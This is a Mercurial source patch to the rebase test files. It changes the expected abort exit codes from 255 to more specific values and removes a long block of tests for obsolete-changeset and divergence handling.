@@ -18,7 +18,7 @@
$ hg rebase
abort: you must specify a destination
(use: hg rebase -d REV)
- [255]
+ [10]
$ hg rebase -d 1
rebasing 2:5db65b93a12b tip "cc"
saved backup bundle to $TESTTMP/repo/.hg/strip-backup/5db65b93a12b-4fb789ec-rebase.hg
@@ -74,7 +74,7 @@
$ hg pull --rebase
abort: rebase destination required by configuration
(use hg pull followed by hg rebase -d DEST)
- [255]
+ [10]
Setup rebase with multiple destinations
@@ -152,7 +152,7 @@
> A D
> EOS
abort: --collapse does not work with multiple destinations
- [255]
+ [10]
Multiple destinations cannot be used with --base:
@@ -192,7 +192,7 @@
> Z
> EOS
abort: rebase destination for f0a671a46792 is not unique
- [255]
+ [10]
Destination is an ancestor of source:
@@ -204,7 +204,7 @@
> Z
> EOS
abort: source and destination form a cycle
- [255]
+ [10]
BUG: cycles aren't flagged correctly when --dry-run is set:
$ rebasewithdag -s B -d 'SRC' --dry-run <<'EOS'
@@ -216,7 +216,7 @@
> EOS
abort: source and destination form a cycle
starting dry-run rebase; repository will not be changed
- [255]
+ [10]
Switch roots:
@@ -329,7 +329,7 @@
> Z
> EOS
abort: source and destination form a cycle
- [255]
+ [10]
Detect source is ancestor of dest in runtime:
@@ -341,7 +341,7 @@
> A
> EOS
abort: source is ancestor of destination
- [255]
+ [10]
"Already rebased" fast path still works:
--- a/tests/test-rebase-interruptions.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-interruptions.t Tue Apr 20 11:01:06 2021 -0400
@@ -350,7 +350,7 @@
M A
rebasing 6:a0b2430ebfb8 tip "F"
abort: precommit hook exited with status 1
- [255]
+ [40]
$ hg tglogp
@ 7: 401ccec5e39f secret 'C'
|
@@ -401,7 +401,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
$ hg tglogp
@ 7: 401ccec5e39f secret 'C'
|
@@ -451,7 +451,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ hg tglogp
@ 7: 401ccec5e39f secret 'C'
|
--- a/tests/test-rebase-mq.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-mq.t Tue Apr 20 11:01:06 2021 -0400
@@ -46,14 +46,14 @@
$ hg rebase -s 1 -d 3
abort: cannot rebase onto an applied mq patch
- [255]
+ [20]
Rebase - same thing, but mq patch is default dest:
$ hg up -q 1
$ hg rebase
abort: cannot rebase onto an applied mq patch
- [255]
+ [20]
$ hg up -q qtip
Rebase - generate a conflict:
--- a/tests/test-rebase-named-branches.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-named-branches.t Tue Apr 20 11:01:06 2021 -0400
@@ -247,7 +247,7 @@
$ hg rebase -s 5 -d 6
abort: source and destination form a cycle
- [255]
+ [10]
$ hg rebase -s 6 -d 5
rebasing 6:3944801ae4ea "dev-two named branch"
--- a/tests/test-rebase-newancestor.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-newancestor.t Tue Apr 20 11:01:06 2021 -0400
@@ -154,7 +154,7 @@
rebasing 2:ec2c14fb2984 "dev: f-dev stuff"
rebasing 4:4b019212aaf6 "dev: merge default"
abort: rebasing 4:4b019212aaf6 will include unwanted changes from 1:1d1a643d390e
- [255]
+ [10]
$ cd ..
@@ -314,7 +314,7 @@
rebasing 6:b296604d9846 E "E"
rebasing 7:caa9781e507d F tip "F"
abort: rebasing 7:caa9781e507d will include unwanted changes from 4:d6003a550c2c or 3:c1e6b162678d
- [255]
+ [10]
The warning does not get printed if there is no unwanted change detected:
--- a/tests/test-rebase-obsolete.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-obsolete.t Tue Apr 20 11:01:06 2021 -0400
@@ -560,7 +560,7 @@
rebasing 2:b18e25de2cf5 D "D"
rebasing 6:f15c3adaf214 F tip "F"
abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents
- [255]
+ [10]
$ cd ..
@@ -743,1398 +743,3 @@
1 new orphan changesets
$ cd ..
-
-Skip obsolete changeset even with multiple hops
------------------------------------------------
-
-setup
-
- $ hg init obsskip
- $ cd obsskip
- $ cat << EOF >> .hg/hgrc
- > [experimental]
- > rebaseskipobsolete = True
- > [extensions]
- > strip =
- > EOF
- $ echo A > A
- $ hg add A
- $ hg commit -m A
- $ echo B > B
- $ hg add B
- $ hg commit -m B0
- $ hg commit --amend -m B1
- $ hg commit --amend -m B2
- $ hg up --hidden 'desc(B0)'
- 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
- updated to hidden changeset a8b11f55fb19
- (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290)
- $ echo C > C
- $ hg add C
- $ hg commit -m C
- 1 new orphan changesets
- $ hg log -G
- @ 4:212cb178bcbb C
- |
- | o 3:261e70097290 B2
- | |
- x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290)
- |/
- o 0:4a2df7238c3b A
-
-
-Rebase finds its way in a chain of marker
-
- $ hg rebase -d 'desc(B2)'
- note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2"
- rebasing 4:212cb178bcbb tip "C"
-
-Even when the chain include missing node
-
- $ hg up --hidden 'desc(B0)'
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- updated to hidden changeset a8b11f55fb19
- (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290)
- $ echo D > D
- $ hg add D
- $ hg commit -m D
- 1 new orphan changesets
- $ hg --hidden strip -r 'desc(B1)'
- saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg
- 1 new orphan changesets
- $ hg log -G
- @ 5:1a79b7535141 D
- |
- | o 4:ff2c4d47b71d C
- | |
- | o 2:261e70097290 B2
- | |
- x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290)
- |/
- o 0:4a2df7238c3b A
-
-
- $ hg rebase -d 'desc(B2)'
- note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2"
- rebasing 5:1a79b7535141 tip "D"
- $ hg up 4
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo "O" > O
- $ hg add O
- $ hg commit -m O
- $ echo "P" > P
- $ hg add P
- $ hg commit -m P
- $ hg log -G
- @ 8:8d47583e023f P
- |
- o 7:360bbaa7d3ce O
- |
- | o 6:9c48361117de D
- | |
- o | 4:ff2c4d47b71d C
- |/
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
- $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true
- 1 new obsolescence markers
- obsoleted 1 changesets
- 1 new orphan changesets
- $ hg rebase -d 6 -r "4::"
- rebasing 4:ff2c4d47b71d "C"
- note: not rebasing 7:360bbaa7d3ce "O", it has no successor
- rebasing 8:8d47583e023f tip "P"
-
-If all the changeset to be rebased are obsolete and present in the destination, we
-should display a friendly error message
-
- $ hg log -G
- @ 10:121d9e3bc4c6 P
- |
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
-
- $ hg up 9
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo "non-relevant change" > nonrelevant
- $ hg add nonrelevant
- $ hg commit -m nonrelevant
- created new head
- $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true
- 1 new obsolescence markers
- obsoleted 1 changesets
- $ hg log -G
- @ 11:f44da1f4954c nonrelevant (pruned)
- |
- | o 10:121d9e3bc4c6 P
- |/
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
- $ hg rebase -r . -d 10
- note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor
-
-If a rebase is going to create divergence, it should abort
-
- $ hg log -G
- @ 10:121d9e3bc4c6 P
- |
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
-
- $ hg up 9
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo "john" > doe
- $ hg add doe
- $ hg commit -m "john doe"
- created new head
- $ hg up 10
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo "foo" > bar
- $ hg add bar
- $ hg commit --amend -m "10'"
- $ hg up 10 --hidden
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- updated to hidden changeset 121d9e3bc4c6
- (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2)
- $ echo "bar" > foo
- $ hg add foo
- $ hg commit -m "bar foo"
- 1 new orphan changesets
- $ hg log -G
- @ 14:73568ab6879d bar foo
- |
- | o 13:77d874d096a2 10'
- | |
- | | o 12:3eb461388009 john doe
- | |/
- x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2)
- |/
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
- $ hg summary
- parent: 14:73568ab6879d tip (orphan)
- bar foo
- branch: default
- commit: (clean)
- update: 2 new changesets, 3 branch heads (merge)
- phases: 8 draft
- orphan: 1 changesets
- $ hg rebase -s 10 -d 12
- abort: this rebase will cause divergences from: 121d9e3bc4c6
- (to force the rebase please set experimental.evolution.allowdivergence=True)
- [255]
- $ hg log -G
- @ 14:73568ab6879d bar foo
- |
- | o 13:77d874d096a2 10'
- | |
- | | o 12:3eb461388009 john doe
- | |/
- x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2)
- |/
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
-With experimental.evolution.allowdivergence=True, rebase can create divergence
-
- $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True
- rebasing 10:121d9e3bc4c6 "P"
- rebasing 14:73568ab6879d tip "bar foo"
- 2 new content-divergent changesets
- $ hg summary
- parent: 16:61bd55f69bc4 tip
- bar foo
- branch: default
- commit: (clean)
- update: 1 new changesets, 2 branch heads (merge)
- phases: 8 draft
- content-divergent: 2 changesets
-
-rebase --continue + skipped rev because their successors are in destination
-we make a change in trunk and work on conflicting changes to make rebase abort.
-
- $ hg log -G -r 16::
- @ 16:61bd55f69bc4 bar foo
- |
- ~
-
-Create the two changes in trunk
- $ printf "a" > willconflict
- $ hg add willconflict
- $ hg commit -m "willconflict first version"
-
- $ printf "dummy" > C
- $ hg commit -m "dummy change successor"
-
-Create the changes that we will rebase
- $ hg update -C 16 -q
- $ printf "b" > willconflict
- $ hg add willconflict
- $ hg commit -m "willconflict second version"
- created new head
- $ printf "dummy" > K
- $ hg add K
- $ hg commit -m "dummy change"
- $ printf "dummy" > L
- $ hg add L
- $ hg commit -m "dummy change"
- $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true
- 1 new obsolescence markers
- obsoleted 1 changesets
- 1 new orphan changesets
-
- $ hg log -G -r 16::
- @ 21:7bdc8a87673d dummy change
- |
- x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51)
- |
- o 19:b82fb57ea638 willconflict second version
- |
- | o 18:601db7a18f51 dummy change successor
- | |
- | o 17:357ddf1602d5 willconflict first version
- |/
- o 16:61bd55f69bc4 bar foo
- |
- ~
- $ hg rebase -r ".^^ + .^ + ." -d 18
- rebasing 19:b82fb57ea638 "willconflict second version"
- merging willconflict
- warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
-
- $ hg resolve --mark willconflict
- (no more unresolved files)
- continue: hg rebase --continue
- $ hg rebase --continue
- rebasing 19:b82fb57ea638 "willconflict second version"
- note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor"
- rebasing 21:7bdc8a87673d tip "dummy change"
- $ cd ..
-
-Divergence cases due to obsolete changesets
--------------------------------------------
-
-We should ignore branches with unstable changesets when they are based on an
-obsolete changeset which successor is in rebase set.
-
- $ hg init divergence
- $ cd divergence
- $ cat >> .hg/hgrc << EOF
- > [extensions]
- > strip =
- > [alias]
- > strip = strip --no-backup --quiet
- > [templates]
- > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n'
- > EOF
-
- $ hg debugdrawdag <<EOF
- > e f
- > | |
- > d' d # replace: d -> d'
- > \ /
- > c
- > |
- > x b
- > \|
- > a
- > EOF
- 1 new orphan changesets
- $ hg log -G -r 'a'::
- * 7:1143e9adc121 f
- |
- | o 6:d60ebfa0f1cb e
- | |
- | o 5:027ad6c5830d d'
- | |
- x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
- |/
- o 3:a82ac2b38757 c
- |
- | o 2:630d7c95eff7 x
- | |
- o | 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
-
-Changeset d and its descendants are excluded to avoid divergence of d, which
-would occur because the successor of d (d') is also in rebaseset. As a
-consequence f (descendant of d) is left behind.
-
- $ hg rebase -b 'e' -d 'x'
- rebasing 1:488e1b7e7341 b "b"
- rebasing 3:a82ac2b38757 c "c"
- rebasing 5:027ad6c5830d d' "d'"
- rebasing 6:d60ebfa0f1cb e "e"
- note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence
- $ hg log -G -r 'a'::
- o 11:eb6d63fc4ed5 e
- |
- o 10:44d8c724a70c d'
- |
- o 9:d008e6b4d3fd c
- |
- o 8:67e8f4a16c49 b
- |
- | * 7:1143e9adc121 f
- | |
- | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5)
- | | |
- | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c)
- | | |
- | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
- | |/
- | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd)
- | |
- o | 2:630d7c95eff7 x
- | |
- | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49)
- |/
- o 0:b173517d0057 a
-
- $ hg strip -r 8:
- $ hg log -G -r 'a'::
- * 7:1143e9adc121 f
- |
- | o 6:d60ebfa0f1cb e
- | |
- | o 5:027ad6c5830d d'
- | |
- x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
- |/
- o 3:a82ac2b38757 c
- |
- | o 2:630d7c95eff7 x
- | |
- o | 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
-
-If the rebase set has an obsolete (d) with a successor (d') outside the rebase
-set and none in destination, we still get the divergence warning.
-By allowing divergence, we can perform the rebase.
-
- $ hg rebase -r 'c'::'f' -d 'x'
- abort: this rebase will cause divergences from: 76be324c128b
- (to force the rebase please set experimental.evolution.allowdivergence=True)
- [255]
- $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x'
- rebasing 3:a82ac2b38757 c "c"
- rebasing 4:76be324c128b d "d"
- rebasing 7:1143e9adc121 f tip "f"
- 1 new orphan changesets
- 2 new content-divergent changesets
- $ hg log -G -r 'a':: -T instabilities
- o 10:e1744ea07510 f
- |
- * 9:e2b36ea9a0a0 d (content-divergent)
- |
- o 8:6a0376de376e c
- |
- | x 7:1143e9adc121 f
- | |
- | | * 6:d60ebfa0f1cb e (orphan)
- | | |
- | | * 5:027ad6c5830d d' (orphan content-divergent)
- | | |
- | x | 4:76be324c128b d
- | |/
- | x 3:a82ac2b38757 c
- | |
- o | 2:630d7c95eff7 x
- | |
- | o 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
- $ hg strip -r 8:
-
-(Not skipping obsoletes means that divergence is allowed.)
-
- $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x'
- rebasing 3:a82ac2b38757 c "c"
- rebasing 4:76be324c128b d "d"
- rebasing 7:1143e9adc121 f tip "f"
- 1 new orphan changesets
- 2 new content-divergent changesets
-
- $ hg strip -r 0:
-
-Similar test on a more complex graph
-
- $ hg debugdrawdag <<EOF
- > g
- > |
- > f e
- > | |
- > e' d # replace: e -> e'
- > \ /
- > c
- > |
- > x b
- > \|
- > a
- > EOF
- 1 new orphan changesets
- $ hg log -G -r 'a':
- * 8:2876ce66c6eb g
- |
- | o 7:3ffec603ab53 f
- | |
- x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea)
- | |
- | o 5:63324dc512ea e'
- | |
- o | 4:76be324c128b d
- |/
- o 3:a82ac2b38757 c
- |
- | o 2:630d7c95eff7 x
- | |
- o | 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
- $ hg rebase -b 'f' -d 'x'
- rebasing 1:488e1b7e7341 b "b"
- rebasing 3:a82ac2b38757 c "c"
- rebasing 5:63324dc512ea e' "e'"
- rebasing 7:3ffec603ab53 f "f"
- rebasing 4:76be324c128b d "d"
- note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence
- $ hg log -G -r 'a':
- o 13:a1707a5b7c2c d
- |
- | o 12:ef6251596616 f
- | |
- | o 11:b6f172e64af9 e'
- |/
- o 10:d008e6b4d3fd c
- |
- o 9:67e8f4a16c49 b
- |
- | * 8:2876ce66c6eb g
- | |
- | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616)
- | | |
- | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea)
- | | |
- | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9)
- | | |
- | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c)
- | |/
- | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd)
- | |
- o | 2:630d7c95eff7 x
- | |
- | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49)
- |/
- o 0:b173517d0057 a
-
-
-issue5782
- $ hg strip -r 0:
- $ hg debugdrawdag <<EOF
- > d
- > |
- > c1 c # replace: c -> c1
- > \ /
- > b
- > |
- > a
- > EOF
- 1 new orphan changesets
- $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'`
- 1 new obsolescence markers
- obsoleted 1 changesets
- $ hg log -G -r 'a': --hidden
- * 4:76be324c128b d
- |
- | x 3:ef8a456de8fa c1 (pruned)
- | |
- x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa)
- |/
- o 1:488e1b7e7341 b
- |
- o 0:b173517d0057 a
-
- $ hg rebase -d 0 -r 2
- rebasing 2:a82ac2b38757 c "c"
- $ hg log -G -r 'a': --hidden
- o 5:69ad416a4a26 c
- |
- | * 4:76be324c128b d
- | |
- | | x 3:ef8a456de8fa c1 (pruned)
- | | |
- | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26)
- | |/
- | o 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
- $ cd ..
-
-Rebase merge where successor of one parent is equal to destination (issue5198)
-
- $ hg init p1-succ-is-dest
- $ cd p1-succ-is-dest
-
- $ hg debugdrawdag <<EOF
- > F
- > /|
- > E D B # replace: D -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d B -s D
- note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
- rebasing 4:66f1a38021c9 F tip "F"
- $ hg log -G
- o 5:50e9d60b99c6 F
- |\
- | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6)
- | |/|
- | o | 3:7fb047a69f22 E
- | | |
- | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
- | |/
- o | 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of other parent is equal to destination
-
- $ hg init p2-succ-is-dest
- $ cd p2-succ-is-dest
-
- $ hg debugdrawdag <<EOF
- > F
- > /|
- > E D B # replace: E -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d B -s E
- note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
- rebasing 4:66f1a38021c9 F tip "F"
- $ hg log -G
- o 5:aae1787dacee F
- |\
- | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee)
- | |/|
- | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
- | | |
- | o | 2:b18e25de2cf5 D
- | |/
- o / 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of one parent is ancestor of destination
-
- $ hg init p1-succ-in-dest
- $ cd p1-succ-in-dest
-
- $ hg debugdrawdag <<EOF
- > F C
- > /| |
- > E D B # replace: D -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d C -s D
- note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
- rebasing 5:66f1a38021c9 F tip "F"
-
- $ hg log -G
- o 6:0913febf6439 F
- |\
- +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439)
- | | |
- | o | 4:26805aba1e60 C
- | | |
- o | | 3:7fb047a69f22 E
- | | |
- +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
- | |
- | o 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of other parent is ancestor of destination
-
- $ hg init p2-succ-in-dest
- $ cd p2-succ-in-dest
-
- $ hg debugdrawdag <<EOF
- > F C
- > /| |
- > E D B # replace: E -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d C -s E
- note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
- rebasing 5:66f1a38021c9 F tip "F"
- $ hg log -G
- o 6:c6ab0cc6d220 F
- |\
- +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220)
- | | |
- | o | 4:26805aba1e60 C
- | | |
- | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
- | | |
- o---+ 2:b18e25de2cf5 D
- / /
- o / 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of one parent is ancestor of destination
-
- $ hg init p1-succ-in-dest-b
- $ cd p1-succ-in-dest-b
-
- $ hg debugdrawdag <<EOF
- > F C
- > /| |
- > E D B # replace: E -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d C -b F
- rebasing 2:b18e25de2cf5 D "D"
- note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
- rebasing 5:66f1a38021c9 F tip "F"
- note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes
- $ hg log -G
- o 6:8f47515dda15 D
- |
- | x 5:66f1a38021c9 F (pruned using rebase)
- | |\
- o | | 4:26805aba1e60 C
- | | |
- | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
- | | |
- | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15)
- | |/
- o / 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of other parent is ancestor of destination
-
- $ hg init p2-succ-in-dest-b
- $ cd p2-succ-in-dest-b
-
- $ hg debugdrawdag <<EOF
- > F C
- > /| |
- > E D B # replace: D -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d C -b F
- note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
- rebasing 3:7fb047a69f22 E "E"
- rebasing 5:66f1a38021c9 F tip "F"
- note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes
-
- $ hg log -G
- o 6:533690786a86 E
- |
- | x 5:66f1a38021c9 F (pruned using rebase)
- | |\
- o | | 4:26805aba1e60 C
- | | |
- | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86)
- | | |
- | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
- | |/
- o / 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where extinct node has successor that is not an ancestor of
-destination
-
- $ hg init extinct-with-succ-not-in-dest
- $ cd extinct-with-succ-not-in-dest
-
- $ hg debugdrawdag <<EOF
- > E C # replace: C -> E
- > | |
- > D B
- > |/
- > A
- > EOF
-
- $ hg rebase -d D -s B
- rebasing 1:112478962961 B "B"
- note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence
-
- $ cd ..
-
- $ hg init p2-succ-in-dest-c
- $ cd p2-succ-in-dest-c
-
-The scenario here was that B::D were developed on default. B was queued on
-stable, but amended before being push to hg-committed. C was queued on default,
-along with unrelated J.
-
- $ hg debugdrawdag <<EOF
- > J
- > |
- > F
- > |
- > E
- > | D
- > | |
- > | C # replace: C -> F
- > | | H I # replace: B -> H -> I
- > | B |/
- > |/ G
- > A
- > EOF
- 1 new orphan changesets
-
-This strip seems to be the key to avoid an early divergence warning.
- $ hg --config extensions.strip= --hidden strip -qr H
- 1 new orphan changesets
-
- $ hg rebase -b 'desc("D")' -d 'desc("J")'
- abort: this rebase will cause divergences from: 112478962961
- (to force the rebase please set experimental.evolution.allowdivergence=True)
- [255]
-
-Rebase merge where both parents have successors in destination
-
- $ hg init p12-succ-in-dest
- $ cd p12-succ-in-dest
- $ hg debugdrawdag <<'EOS'
- > E F
- > /| /| # replace: A -> C
- > A B C D # replace: B -> D
- > | |
- > X Y
- > EOS
- 1 new orphan changesets
- $ hg rebase -r A+B+E -d F
- note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C"
- note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D"
- rebasing 7:dac5d11c5a7d E tip "E"
- abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f
- [255]
- $ cd ..
-
-Rebase a non-clean merge. One parent has successor in destination, the other
-parent moves as requested.
-
- $ hg init p1-succ-p2-move
- $ cd p1-succ-p2-move
- $ hg debugdrawdag <<'EOS'
- > D Z
- > /| | # replace: A -> C
- > A B C # D/D = D
- > EOS
- 1 new orphan changesets
- $ hg rebase -r A+B+D -d Z
- note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C"
- rebasing 1:fc2b737bb2e5 B "B"
- rebasing 3:b8ed089c80ad D "D"
-
- $ rm .hg/localtags
- $ hg log -G
- o 6:e4f78693cc88 D
- |
- o 5:76840d832e98 B
- |
- o 4:50e41c1f3950 Z
- |
- o 2:96cc3511f894 C
-
- $ hg files -r tip
- B
- C
- D
- Z
-
- $ cd ..
-
- $ hg init p1-move-p2-succ
- $ cd p1-move-p2-succ
- $ hg debugdrawdag <<'EOS'
- > D Z
- > /| | # replace: B -> C
- > A B C # D/D = D
- > EOS
- 1 new orphan changesets
- $ hg rebase -r B+A+D -d Z
- rebasing 0:426bada5c675 A "A"
- note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C"
- rebasing 3:b8ed089c80ad D "D"
-
- $ rm .hg/localtags
- $ hg log -G
- o 6:1b355ed94d82 D
- |
- o 5:a81a74d764a6 A
- |
- o 4:50e41c1f3950 Z
- |
- o 2:96cc3511f894 C
-
- $ hg files -r tip
- A
- C
- D
- Z
-
- $ cd ..
-
-Test that bookmark is moved and working dir is updated when all changesets have
-equivalents in destination
- $ hg init rbsrepo && cd rbsrepo
- $ echo "[experimental]" > .hg/hgrc
- $ echo "evolution=true" >> .hg/hgrc
- $ echo "rebaseskipobsolete=on" >> .hg/hgrc
- $ echo root > root && hg ci -Am root
- adding root
- $ echo a > a && hg ci -Am a
- adding a
- $ hg up 0
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo b > b && hg ci -Am b
- adding b
- created new head
- $ hg rebase -r 2 -d 1
- rebasing 2:1e9a3c00cbe9 tip "b"
- $ hg log -r . # working dir is at rev 3 (successor of 2)
- 3:be1832deae9a b (no-eol)
- $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now
- bookmarking hidden changeset 1e9a3c00cbe9
- (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a)
- $ hg up 2 && hg log -r . # working dir is at rev 2 again
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol)
- $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1
- note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b"
-Check that working directory and bookmark was updated to rev 3 although rev 2
-was skipped
- $ hg log -r .
- 3:be1832deae9a b (no-eol)
- $ hg bookmarks
- mybook 3:be1832deae9a
- $ hg debugobsolete --rev tip
- 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'}
-
-Obsoleted working parent and bookmark could be moved if an ancestor of working
-parent gets moved:
-
- $ hg init $TESTTMP/ancestor-wd-move
- $ cd $TESTTMP/ancestor-wd-move
- $ hg debugdrawdag <<'EOS'
- > E D1 # rebase: D1 -> D2
- > | |
- > | C
- > D2 |
- > | B
- > |/
- > A
- > EOS
- $ hg update D1 -q
- $ hg bookmark book -i
- $ hg rebase -r B+D1 -d E
- rebasing 1:112478962961 B "B"
- note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2"
- 1 new orphan changesets
